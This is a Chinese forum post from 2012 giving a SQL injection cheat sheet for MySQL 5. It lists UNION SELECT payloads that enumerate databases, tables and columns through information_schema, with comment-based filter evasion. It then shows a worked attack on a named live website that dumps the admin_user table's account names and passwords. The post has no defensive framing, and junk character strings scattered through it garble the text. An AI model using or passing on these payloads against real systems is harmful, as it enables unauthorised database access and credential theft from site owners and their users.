查库
9 e, J2 X+ E1 ?0 g6 c9 q3 V; T8 x3 v) Y7 j4 Q2 q( I+ k
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
( s0 X8 P3 x3 b& F5 X9 f1 f0 I/ B% t; m4 w* K" H/ }4 G9 c
查表
0 E: l; H( S5 m$ i+ V P( p3 D) Y( y' t- Q% T7 W7 b
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,18 j) p1 |- T+ m
, E% a/ O! v0 e) G* X+ h* X查段 |3 [1 S( n3 j: A
( p+ M% a' z1 C# q' N3 aid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
" {' |' Z" L9 X3 z f; O) p o- c1 S9 z) J9 \5 F9 O! O
9 O! ]5 c; ^, }$ V% u# |
mysql5高级注入方法暴表/ i# _) x: O5 {/ C3 \1 w7 X) H
5 ^1 z" T+ y! F* A. q' |
例子如下:
# R$ w# }0 L# v+ C5 _
' M, z9 Q3 Y& f3 Z3 p& V3 C/ Q4 N1.爆表
* J( ?+ i, q/ G; e# I" [http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)+ [, W) f: Y) v" ]/ H
这样爆到第4个时出现了admin_user表。4 J! B" H+ S0 g+ s# F' w; @& A; [
1 P* m, V _+ U6 J0 \! h2.暴字段
9 [, `3 h6 q) c9 G2 B4 lhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*. K* F3 F: @0 N& s
2 Q6 O& s c# u
( ]( j' Y# B" x3.爆密码
4 U2 q, s* J# h/ k% G& d+ Ghttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* `) `+ W) |. a. d9 f
2 Q0 K, ]( [! ^9 w2 V! U( C4 t
. _# M3 l: j6 h, n3 { |
发表于 2012-9-13 16:29:37
收藏
支持
反对